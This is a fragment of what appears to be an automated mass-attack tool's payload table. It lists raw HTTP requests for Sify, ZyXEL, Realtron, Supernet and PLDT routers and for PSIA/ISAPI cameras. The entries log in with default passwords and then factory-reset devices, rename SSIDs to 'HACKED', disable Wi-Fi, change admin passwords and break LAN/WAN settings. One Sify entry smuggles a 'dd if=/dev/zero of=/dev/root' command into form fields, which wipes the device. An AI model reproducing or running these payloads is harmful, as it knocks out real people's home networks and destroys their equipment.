'PUT /PSIA/System/Network/interfaces/1?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\n<NetworkInterface><id>1</id><IPAddress><ipVersion>dual</ipVersion><addressingType>static</addressingType><ipAddress>10.%%RAND8%%</ipAddress><subnetMask>255.255.255.0</subnetMask><DefaultGateway><ipAddress>10.%%COMP8%%</ipAddress></DefaultGateway><ipV6AddressingType>ra</ipV6AddressingType><PrimaryDNS><ipAddress>1.2.3.4</ipAddress></PrimaryDNS><SecondaryDNS><hostName>1.2.3.5</hostName></SecondaryDNS></IPAddress><Link><MACAddress>8c:e7:48:35:ad:e4</MACAddress><autoNegotiation>true</autoNegotiation><speed>0</speed><duplex>full</duplex><MTU>1500</MTU></Link></NetworkInterface>' ,
6422
'PUT /ISAPI/System/Network/PPPoE/1?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\n<PPPoE><id>1</id><enabled>false</enabled><ethernetIfId>1</ethernetIfId><userName></userName><password></password></PPPoE>' ,
6423
'PUT /ISAPI/System/factoryReset?mode=full?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n' ,
6424
 'PUT /PSIA/System/factoryReset?mode=full?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n' ,
6425
'PUT /PSIA/System/reboot?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n' ,
6426
 'GET / HTTP/1.0\r\n\r\n' ,
6427
 ] ,
6428
[ 'sify' , '200 OK.*Accept-Ranges: bytes.*Expires.*content=-1.*0; URL=/cgi-bin/luci' ,
6429
 'POST /cgi-bin/luci/;stok=15443bacdb9a6ddd5df893eef7cbb995 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\npage=login&username=admin&password=admin' ,
6430
 'GET /cgi-bin/luci/;strok=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: sysauth=%%CUSTOM2%%\r\n\r\n' ,
6431
'POST /cgi-bin/luci/;stok=%%CUSTOM1%%/html/CM_Location HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: sysauth=%%CUSTOM2%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\ncname=%60dd+if%3D%2Fdev%2Fzero+of%3D%2Fdev%2Froot%60&lname=%60dd+if%3D%2Fdev%2Fzero+of%3D%2Fdev%2Froot%60&email=N%2FA&phone=1&linkid=4028151015&linkid2=N%2FA&linkid3=N%2FA&linkid4=N%2FA' ,
6432
'POST /cgi-bin/luci/;stok=%%CUSTOM1%%/html/SIFYOS_WLAN HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: sysauth=%%CUSTOM2%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWLANMode=11na&WLANChannel=36&WLANaSSID=sify-is-HACKED&WLANPreferBSSID=50%3AFE%3AF2%3A00%3AC5%3A3C&secMode=none&passphrase=&ChanBwMode=0&reqfile=ST_WLAN&actionCheckBoxMgr=PreferBSSIDEnable&actionCfgSave=&actionWLANDriverApplyCfg=' ,
6433
'POST /cgi-bin/luci/;stok=%%CUSTOM1%%/html/WANSettings_StaticIP HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: sysauth=%%CUSTOM2%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWANConnectionType=2&WANGeneralAccount=&WANGeneralDomain=&WANMTUMode=0&WANGeneralIP=10.%%RAND8%%&wgip1=10&wgip2=%%RAND81%%&wgip3=%%RAND82%%&wgip4=%%RAND83%%&WANGeneralSubnetMask=255.255.255.0&wgsm1=255&wgsm2=255&wgsm3=255&wgsm4=0&WANGeneralGateway=10.%%COMP8%%&wggw1=10&wggw2=%%COMP81%%&wggw3=%%COMP82%%&wggw4=%%COMP83%%&WANDNSSourc=1&WANPrimaryDNSIP=0.0.0.0&wpdns1=0&wpdns2=0&wpdns3=0&wpdns4=0&WANSecondaryDNSIP=0.0.0.0&wsdns1=0&wsdns2=0&wsdns3=0&wsdns4=0&WANGeneralMACSel=0&WANGeneralMAClone=00%3A00%3A00%3A00%3A55%3A00&mac=%40%23statusRemotePCMAC%23%24&actionCfgSave=&wnat=chknat&igateway=icommit&reqfile=WANSettings_StaticIP&actionWANApplyCfg=' ,
6434
'POST /cgi-bin/luci/;stok=%%CUSTOM1%%/html/LANSettings HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: sysauth=%%CUSTOM2%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nLANIP=10.%%COMP8%%&lip1=10&lip2=%%COMP81%%&lip3=%%COMP82%%&lip4=%%COMP83%%&LANSubnetmask=255.255.255.254&lsm1=255&lsm2=255&lsm3=255&lsm4=254&LANDHCPSrvStartAddr=192.168.1.100&LANDHCPSrvStopAddr=192.168.1.200&LANWINSAddr=0.0.0.0&reqfile=LANSettings&actionCheckBoxMgr=LANDHCPSrvEnable&actionCheckBoxMgr=DSTEnable&actionCheckBoxMgr=RAEnable&actionCfgSave=&actionLANApplyCfg=' ,
6435
'GET /cgi-bin/luci/;stok=%%CUSTOM1%%/html/uci/saveapply?formname=CM_ConfigChanges HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: sysauth=%%CUSTOM2%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nLANIP=10.%%COMP8%%&lip1=10&lip2=%%COMP81%%&lip3=%%COMP82%%&lip4=%%COMP83%%&LANSubnetmask=255.255.255.254&lsm1=255&lsm2=255&lsm3=255&lsm4=254&LANDHCPSrvStartAddr=192.168.1.100&LANDHCPSrvStopAddr=192.168.1.200&LANWINSAddr=0.0.0.0&reqfile=LANSettings&actionCheckBoxMgr=LANDHCPSrvEnable&actionCheckBoxMgr=DSTEnable&actionCheckBoxMgr=RAEnable&actionCfgSave=&actionLANApplyCfg=' ,
6436
'GET / HTTP/1.0\r\n\r\n' ,
6437
 ] ,
6438
[ 'zyxelp660' , 'RomPager.*Welcome to the Web-Based Configurator.*GoLive Cyber' ,
6439
 'POST /Forms/rpAuth_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nLoginPassword=ZyXEL+ZyWALL+Series&hiddenPassword=81dc9bdb52d04dc20036dbd8313ed055&Prestige_Login=Login' ,
6440
'POST /Forms/rpAuth_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nLoginPassword=ZyXEL+ZyWALL+Series&hiddenPassword=21232f297a57a5a743894a0e4a801fc3&Prestige_Login=Login' ,
6441
'POST /Forms/LAN_IP_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nLANIPAddr=10.%%RAND8%%&LANSubnetMask=255.255.255.254&sysSubmit=Apply' ,
6442
 'POST /Forms/LAN_DHCPSetup_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nDHCP_Mode=00000001&sysPoolStartingAddr=192.168.%%RAND16%%&sysPoolCount=32&DHCPPriDNSAddr=1.2.3.4&DHCPSecDNSAddr=1.2.3.5&sysSubmit=Apply' ,
6443
 'POST /Forms/WAN_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nwan_RemoteName=HACKED&wan_Mode=00000001&wanModeFlag=0&wan_Encapsulation=PPPoA&wanEncapFlag=0&wan_UserName=hacked&wan_Password=hacked&wan_ServiceName=&wan_Multiplex=LLC&wan_VPI=8&wan_VCI=35&wan_DynIP=DynamicIP&wan_ConnectSel=Conn_on_Demand&wan_IdleTime=0&WANApply=Apply' ,
6444
 'GET / HTTP/1.0\r\n\r\n' ,
6445
 ] ,
6446
[ 'realtron' , '401.*Server:Realtron WebServer.*Basic realm=index.htm' ,
6447
 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\n' ,
6448
'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\n' ,
6449
'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n\r\n' ,
6450
'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\n' ,
6451
'POST /form2WlanSetup.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nwlanDisabled=ON&save=Apply+Changes&basicrates=0&operrates=0&submit.htm%3Fwlbasic.htm=Send' ,
6452
 'POST /form2WlanSetup.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nwlanDisabled=ON&save=Apply+Changes&basicrates=0&operrates=0&submit.htm%3Fwlbasic.htm=Send' ,
6453
 'POST /form2Dhcpd.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nlan_ip=192.168.1.1&lan_mask=255.255.255.0&dhcpmode=0&lan1=lan1&lan2=lan2&lan3=lan3&lan4=lan4&wlan=wlan&vap0=vap0&vap1=vap1&vap2=vap2&vap3=vap3&dhcpRangeStart=192.168.1.2&dhcpRangeEnd=192.168.1.254&dhcpSubnetMask=255.255.255.0&dfgw=192.168.1.1&ltime=1440&dname=domain.name&dns1=192.168.1.1&dns2=&dns3=&relayaddr=192.168.2.242&submit.htm%3Fdhcpd.htm=Send&save=Apply+Changes' ,
6454
 'POST /form2Dhcpd.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nlan_ip=192.168.1.1&lan_mask=255.255.255.0&dhcpmode=0&lan1=lan1&lan2=lan2&lan3=lan3&lan4=lan4&wlan=wlan&vap0=vap0&vap1=vap1&vap2=vap2&vap3=vap3&dhcpRangeStart=192.168.1.2&dhcpRangeEnd=192.168.1.254&dhcpSubnetMask=255.255.255.0&dfgw=192.168.1.1&ltime=1440&dname=domain.name&dns1=192.168.1.1&dns2=&dns3=&relayaddr=192.168.2.242&submit.htm%3Fdhcpd.htm=Send&save=Apply+Changes' ,
6455
 'POST /form2lansetup.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nip=10.%%RAND8%%&mask=255.255.255.0&ip2=0.0.0.0&mask2=0.0.0.0&snoop=1&submit.htm%3Ftcpiplan.htm=Send' ,
6456
 'POST /form2lansetup.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nip=10.%%RAND8%%&mask=255.255.255.0&ip2=0.0.0.0&mask2=0.0.0.0&snoop=1&submit.htm%3Ftcpiplan.htm=Send' ,
6457
 'POST /form2AttenSave.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsubmit.htm%3Fattention.htm=Send' ,
6458
 'POST /form2AttenSave.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsubmit.htm%3Fattention.htm=Send' ,
6459
 'POST /form2WanAdsl.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\naction=0&idx=0&connid=15&submit.htm%3Fwanadsl_auto_droute.htm=Send' ,
6460
 'POST /form2WanAdsl.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\naction=0&idx=0&connid=15&submit.htm%3Fwanadsl_auto_droute.htm=Send' ,
6461
 'POST /form2WebRefresh.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\npppoenum=2&connect=disconnect&submit.html%3Fstatus_wan.htm=Send' ,
6462
 'POST /form2WebRefresh.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\npppoenum=2&connect=disconnect&submit.html%3Fstatus_wan.htm=Send' ,
6463
 'POST /form2WanPhy.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nphyType=1&submit.htm%3Fwanadsl_auto_droute.htm=Send' ,
6464
 'POST /form2WanPhy.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nphyType=1&submit.htm%3Fwanadsl_auto_droute.htm=Send' ,
6465
 'GET / HTTP/1.0\r\n\r\n' ,
6466
 ] ,
6467
[ 'supernet' , '401 Unauthorized.*realm=ADSL Modem.*Server: WebServer/1.0' ,
6468
 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\n' ,
6469
'POST /Forms/home_lan_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nuiViewIPAddr=10.%%RAND8%%&dhcpFlag=0&ipAddrMain=10.%%RAND8%%&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP1&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&mld_snoop_act=0&dhcpTypeRadio=0&lan_IPv6RadvdEnable=0&lan_IPv6RadvdMode=0&lan_IPv6AutoPrefix=0&lan_Ipv6Address0=2005%3A%3A&lan_Ipv6Address1=64&lan_Ipv6PreLifetime=604800&lan_IPv6ValidLifetime=2592000&lan_ManagedAddr=on&lan_OtherConfig=on&lan_IPv6DHCP6Server=0&lan_IPv6DHCP6Mode=0&lan_Ipv6DHCP6Address0=%3A%3A&lan_Ipv6DHCP6Address1=0&lan_Ipv6DHCP6PreLifetime=0&lan_IPv6DHCP6ValidLifetime=0&lan_IPv6DHCP6DNSServer1=%3A%3A&lan_IPv6DHCP6DNSServer2=%3A%3A' ,
6470
 'POST /Forms/home_wlan_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nwlanWEBFlag=0&AccessFlag=1&wlan_APenable=0&Channel_ID=00000000&BeaconInterval=100&RTSThreshold=2347&FragmentThreshold=2346&DTIM=1&WirelessMode=802.11b%2Bg%2Bn&WLANChannelBandwidth=40+MHz&WLANGuardInterval=AUTO&WLANMCS=AUTO&WLSSIDIndex=1&ESSID_HIDE_Selection=0&ESSID=HACKED&WEP_Selection=WPA-PSK%2FWPA2-PSK&TKIP_Selection=TKIP%2FAES&PreSharedKey=4171258257&WLAN_FltActive=0&WLAN_FltAction=00000000&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLanLockFlag=0&wlanRadiusWEPFlag=0' ,
6471
 'POST /Forms/home_wlan_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nwlanWEBFlag=0&AccessFlag=1&wlan_APenable=0&Channel_ID=00000000&BeaconInterval=100&RTSThreshold=2347&FragmentThreshold=2346&DTIM=1&WirelessMode=802.11b%2Bg%2Bn&WLANChannelBandwidth=40+MHz&WLANGuardInterval=AUTO&WLANMCS=AUTO&WLSSIDIndex=1&ESSID_HIDE_Selection=0&ESSID=HACKED&WEP_Selection=WPA-PSK%2FWPA2-PSK&TKIP_Selection=TKIP%2FAES&PreSharedKey=4171258257&WLAN_FltActive=0&WLAN_FltAction=00000000&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLanLockFlag=0&wlanRadiusWEPFlag=0' ,
6472
 'POST /Forms/home_wan_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nHiddenFlag=0&wan_VC=PVC0&wanVCFlag=0&Alwan_VPI=0&Alwan_VCI=35&Alwan_QoS=nrtVBR&wan_PCR=0&wan_SCR=0&wan_MBS=0&wanIPVersionRadio=1&wanConTypeFlag=0&wanTypeRadio=Three&wan_IPv6DSLiteEnable=0&wan_IPv6DSLiteMode=0&wan_RemoteAddress=%3A%3A&wan_BridgeSelect=2684+Bridged+IP+LLC&BridgeFlag=0&wanIGMPQitFlag=0&wan_PVCO_Flag=0&PageLockValue=0' ,
6473
 'POST /Forms/home_wan_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nHiddenFlag=0&wan_VC=PVC0&wanVCFlag=0&Alwan_VPI=0&Alwan_VCI=35&Alwan_QoS=nrtVBR&wan_PCR=0&wan_SCR=0&wan_MBS=0&wanIPVersionRadio=1&wanConTypeFlag=0&wanTypeRadio=Three&wan_IPv6DSLiteEnable=0&wan_IPv6DSLiteMode=0&wan_RemoteAddress=%3A%3A&wan_BridgeSelect=2684+Bridged+IP+LLC&BridgeFlag=0&wanIGMPQitFlag=0&wan_PVCO_Flag=0&PageLockValue=0' ,
6474
 'POST /Forms/adv_adsl_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nModulationType=G.Lite&AnnexTypeA=ANNEX+M&adsl_opmode_apply=SAVE' ,
6475
 'POST /Forms/adv_adsl_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nModulationType=G.Lite&AnnexTypeA=ANNEX+M&adsl_opmode_apply=SAVE' ,
6476
 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6477
 ] ,
6478
[ 'pldtmydsl' , '^(49\.14[456789]|49\.15[01]|58\.69|112\.20[0-9]|112\.21[01]|119\.9[2345]|122\.[23]|122\.5[2345]|124\.10[4567])\.\d+\.\d+%%%.*200 Ok.*Server: microhttpd.*no-cache.*/index.html' ,
6479
 'POST /login/login-page.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nAuthName=admin&AuthPassword=1234' ,
6480
 'GET /index.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: SESSION=%%CUSTOM1%%\r\nReferer: http://%%TARGETIP%%/login/login-page.cgi\r\n\r\n' ,
6481
 'POST /pages/tabFW/wireless-general.wl HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: tabJson=..%2Fnetwork%2Fwireless%2Ftab.json; tabIndex=0; SESSION=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsessionKey=%%CUSTOM1%%&wlSyncNvram=1&wlDevice=0&wlHide=0&wlAPIsolation=0&wlBssidIsolation=0&wlEnableWmf=0&wlEnableButtom=0&wlExWpa=&wlSsidIdx=0&wlSsid=HACKED&wlAuthMode=psk+psk2&wlWep=disabled&wlAuth=0&wlUseDefaultWpaKey=0&wlWepPassphraseKey=&wlWpaPassphraseKey=&wlEmailEnable=0&wlSelectEmailSend=&wlSendEmailTo=&wlSendEmailTitle=&wlObssCoex=1&wlBand=2&wlEnbl=0&wlChannel=0&wlNBwCap=1&wlNCtrlsb=1&wlPassphraseUI=0&wlSsid_PLDT=HACKED&wlMaxAssoc=64&wlMaxBandwidth=&wlMaxDownBandwidth=&WireLess_EmailSelect=&WireLessSendEmailTitle=&WireLessSendEmailTo=&wlWpa=tkip%2Baes&wlWpaGtkRekey=1800' ,
6482
 'GET /pages/tabFW/wireless-generalrefresh.wl?wlRefresh=0 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: tabJson=..%2Fnetwork%2Fwireless%2Ftab.json; tabIndex=0; SESSION=%%CUSTOM1%%\r\n\r\n' ,
6483
 'POST /login/login-page.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nAuthName=%%LOGIN%%&AuthPassword=%%PASSWORD%%' ,
6484
 'POST /pages/connectionStatus/connectionStatus-SetpppDown.cgi?intfName=ppp1&sessionKey=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: SESSION=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n' ,
6485
 'GET / HTTP/1.0\r\n\r\n' ,
6486
 ] ,
6487
 [ 'pldtfibr' , '302 Redirect.*GoAhead-Webs.*PeerSec-MatrixSSL.*1.1/login.html' ,
6488
 'POST /goform/webLogin HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=adminpldt\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUser=adminpldt&Passwd=0123456789' ,
6489
 'POST /goform/webLogin HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=adminpldt\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUser=adminpldt&Passwd=1234567890' ,
6490
 'POST /goform/webLogin HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=admin\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUser=admin&Passwd=1234' ,
6491
 'POST /goform/wirelessBasic HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nradiohiddenButton=2&radio_on=0&wirelessmode=4&select_regDomain=3&Fre_band=2&sz11aChannel=0&guard_inter=0' ,
6492
 'POST /goform/setAccountSelfPwd HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\naccountSelf_user=%%LOGIN%%&accountSelf_oldPwd=%%PASSWORD%%&accountSelf_newname=&accountSelf_newPwd=%%NEWPASSWORD%%&accountSelf_newPwd2=%%NEWPASSWORD%%' ,
6493
 'POST /goform/webLogin HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=adminpldt\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUser=adminpldt&Passwd=%%NEWPASSWORD%%' ,
6494
 'POST /goform/APSecurity HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nssidIndex=1&SSIDEnable=disable&bssid_num=1&ssidName=HACKED&secure_WMM=1&security_mode=WPAPSKWPA2PSK&security_shared_mode=WEP&wep_default_key=1&WEP1=&WEP1Select=1&WEP2=&WEP2Select=1&WEP3=&WEP3Select=1&WEP4=&WEP4Select=1&cipher=2&passphrase=DefaultPasswordsSuck&PreAuthentication=1&RadiusServerIP=&RadiusServerPort=&RadiusServerSecret=&RadiusServerSessionTimeout=&RadiusServerIdleTimeout=&access_mode=0&addmac=' ,
6495
 'POST /goform/setLan HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nhostname=&lanIp=10.%%RAND8%%&lanNetmask=255.255.255.0&ipv6_static_addr=fe80%3A%3A1%2F64&other_Flag=1&max_Interval=100&min_Interval=30&dns_srouce=0&Pridns_Set=&secdns_Set=&Prefix_Mode=0&Prefix_Set=&enable_dhcp6s=1&v6dhcpstart=0%3A0%3A0%3A2&v6dhcpend=0%3A0%3A0%3A255' ,
6496
'POST /goform/wirelessGetSecurity HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n:""' ,
6497
